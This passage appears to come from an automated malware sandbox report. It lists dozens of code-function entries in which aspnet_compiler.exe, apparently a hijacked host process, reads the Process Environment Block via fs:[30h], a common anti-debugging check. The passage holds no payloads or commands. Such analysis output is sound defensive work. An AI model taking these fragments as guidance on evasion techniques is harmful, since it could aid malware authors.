                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A250 mov eax, dword ptr fs:[00000030h]4_2_0175A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766259 mov eax, dword ptr fs:[00000030h]4_2_01766259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E8243 mov eax, dword ptr fs:[00000030h]4_2_017E8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E8243 mov ecx, dword ptr fs:[00000030h]4_2_017E8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175823B mov eax, dword ptr fs:[00000030h]4_2_0175823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018362D6 mov eax, dword ptr fs:[00000030h]4_2_018362D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702E1 mov eax, dword ptr fs:[00000030h]4_2_017702E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702E1 mov eax, dword ptr fs:[00000030h]4_2_017702E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702E1 mov eax, dword ptr fs:[00000030h]4_2_017702E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181A250 mov eax, dword ptr fs:[00000030h]4_2_0181A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181A250 mov eax, dword ptr fs:[00000030h]4_2_0181A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702A0 mov eax, dword ptr fs:[00000030h]4_2_017702A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702A0 mov eax, dword ptr fs:[00000030h]4_2_017702A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0183625D mov eax, dword ptr fs:[00000030h]4_2_0183625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov ecx, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E0283 mov eax, dword ptr fs:[00000030h]4_2_017E0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E0283 mov eax, dword ptr fs:[00000030h]4_2_017E0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E0283 mov eax, dword ptr fs:[00000030h]4_2_017E0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E284 mov eax, dword ptr fs:[00000030h]4_2_0179E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E284 mov eax, dword ptr fs:[00000030h]4_2_0179E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179656A mov eax, dword ptr fs:[00000030h]4_2_0179656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179656A mov eax, dword ptr fs:[00000030h]4_2_0179656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179656A mov eax, dword ptr fs:[00000030h]4_2_0179656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768550 mov eax, dword ptr fs:[00000030h]4_2_01768550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768550 mov eax, dword ptr fs:[00000030h]4_2_01768550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F6500 mov eax, dword ptr fs:[00000030h]4_2_017F6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C5ED mov eax, dword ptr fs:[00000030h]4_2_0179C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C5ED mov eax, dword ptr fs:[00000030h]4_2_0179C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017625E0 mov eax, dword ptr fs:[00000030h]4_2_017625E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E5E7 mov eax, dword ptr fs:[00000030h]4_2_0178E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017665D0 mov eax, dword ptr fs:[00000030h]4_2_017665D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A5D0 mov eax, dword ptr fs:[00000030h]4_2_0179A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A5D0 mov eax, dword ptr fs:[00000030h]4_2_0179A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E5CF mov eax, dword ptr fs:[00000030h]4_2_0179E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E5CF mov eax, dword ptr fs:[00000030h]4_2_0179E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017845B1 mov eax, dword ptr fs:[00000030h]4_2_017845B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017845B1 mov eax, dword ptr fs:[00000030h]4_2_017845B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E05A7 mov eax, dword ptr fs:[00000030h]4_2_017E05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E05A7 mov eax, dword ptr fs:[00000030h]4_2_017E05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E05A7 mov eax, dword ptr fs:[00000030h]4_2_017E05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E59C mov eax, dword ptr fs:[00000030h]4_2_0179E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01794588 mov eax, dword ptr fs:[00000030h]4_2_01794588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01762582 mov eax, dword ptr fs:[00000030h]4_2_01762582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01762582 mov ecx, dword ptr fs:[00000030h]4_2_01762582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178A470 mov eax, dword ptr fs:[00000030h]4_2_0178A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178A470 mov eax, dword ptr fs:[00000030h]4_2_0178A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178A470 mov eax, dword ptr fs:[00000030h]4_2_0178A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181A49A mov eax, dword ptr fs:[00000030h]4_2_0181A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EC460 mov ecx, dword ptr fs:[00000030h]4_2_017EC460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178245A mov eax, dword ptr fs:[00000030h]4_2_0178245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175645D mov eax, dword ptr fs:[00000030h]4_2_0175645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E443 mov eax, dword ptr fs:[00000030h]4_2_0179E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A430 mov eax, dword ptr fs:[00000030h]4_2_0179A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C427 mov eax, dword ptr fs:[00000030h]4_2_0175C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E420 mov eax, dword ptr fs:[00000030h]4_2_0175E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E420 mov eax, dword ptr fs:[00000030h]4_2_0175E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E420 mov eax, dword ptr fs:[00000030h]4_2_0175E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6420 mov eax, dword ptr fs:[00000030h]4_2_017E6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6420 mov eax, dword ptr fs:[00000030h]4_2_017E6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6420 mov eax, dword ptr fs:[00000030h]4_2_017E6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6420 mov eax, dword ptr fs:[00000030h]4_2_017E6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6420 mov eax, dword ptr fs:[00000030h]4_2_017E6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6420 mov eax, dword ptr fs:[00000030h]4_2_017E6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6420 mov eax, dword ptr fs:[00000030h]4_2_017E6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01798402 mov eax, dword ptr fs:[00000030h]4_2_01798402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01798402 mov eax, dword ptr fs:[00000030h]4_2_01798402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01798402 mov eax, dword ptr fs:[00000030h]4_2_01798402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017604E5 mov ecx, dword ptr fs:[00000030h]4_2_017604E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017944B0 mov ecx, dword ptr fs:[00000030h]4_2_017944B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EA4B0 mov eax, dword ptr fs:[00000030h]4_2_017EA4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181A456 mov eax, dword ptr fs:[00000030h]4_2_0181A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017664AB mov eax, dword ptr fs:[00000030h]4_2_017664AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768770 mov eax, dword ptr fs:[00000030h]4_2_01768770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770770 mov eax, dword ptr fs:[00000030h]4_2_01770770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180678E mov eax, dword ptr fs:[00000030h]4_2_0180678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018147A0 mov eax, dword ptr fs:[00000030h]4_2_018147A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EE75D mov eax, dword ptr fs:[00000030h]4_2_017EE75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01760750 mov eax, dword ptr fs:[00000030h]4_2_01760750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2750 mov eax, dword ptr fs:[00000030h]4_2_017A2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2750 mov eax, dword ptr fs:[00000030h]4_2_017A2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E4755 mov eax, dword ptr fs:[00000030h]4_2_017E4755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179674D mov esi, dword ptr fs:[00000030h]4_2_0179674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179674D mov eax, dword ptr fs:[00000030h]4_2_0179674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179674D mov eax, dword ptr fs:[00000030h]4_2_0179674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179273C mov eax, dword ptr fs:[00000030h]4_2_0179273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179273C mov ecx, dword ptr fs:[00000030h]4_2_0179273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179273C mov eax, dword ptr fs:[00000030h]4_2_0179273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DC730 mov eax, dword ptr fs:[00000030h]4_2_017DC730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C720 mov eax, dword ptr fs:[00000030h]4_2_0179C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C720 mov eax, dword ptr fs:[00000030h]4_2_0179C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01760710 mov eax, dword ptr fs:[00000030h]4_2_01760710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01790710 mov eax, dword ptr fs:[00000030h]4_2_01790710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179C700 mov eax, dword ptr fs:[00000030h]4_2_0179C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017647FB mov eax, dword ptr fs:[00000030h]4_2_017647FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017647FB mov eax, dword ptr fs:[00000030h]4_2_017647FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017827ED mov eax, dword ptr fs:[00000030h]4_2_017827ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017827ED mov eax, dword ptr fs:[00000030h]4_2_017827ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017827ED mov eax, dword ptr fs:[00000030h]4_2_017827ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017EE7E1 mov eax, dword ptr fs:[00000030h]4_2_017EE7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176C7C0 mov eax, dword ptr fs:[00000030h]4_2_0176C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E07C3 mov eax, dword ptr fs:[00000030h]4_2_017E07C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017607AF mov eax, dword ptr fs:[00000030h]4_2_017607AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01792674 mov eax, dword ptr fs:[00000030h]4_2_01792674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A660 mov eax, dword ptr fs:[00000030h]4_2_0179A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A660 mov eax, dword ptr fs:[00000030h]4_2_0179A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177C640 mov eax, dword ptr fs:[00000030h]4_2_0177C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E627 mov eax, dword ptr fs:[00000030h]4_2_0177E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01796620 mov eax, dword ptr fs:[00000030h]4_2_01796620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01798620 mov eax, dword ptr fs:[00000030h]4_2_01798620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176262C mov eax, dword ptr fs:[00000030h]4_2_0176262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2619 mov eax, dword ptr fs:[00000030h]4_2_017A2619
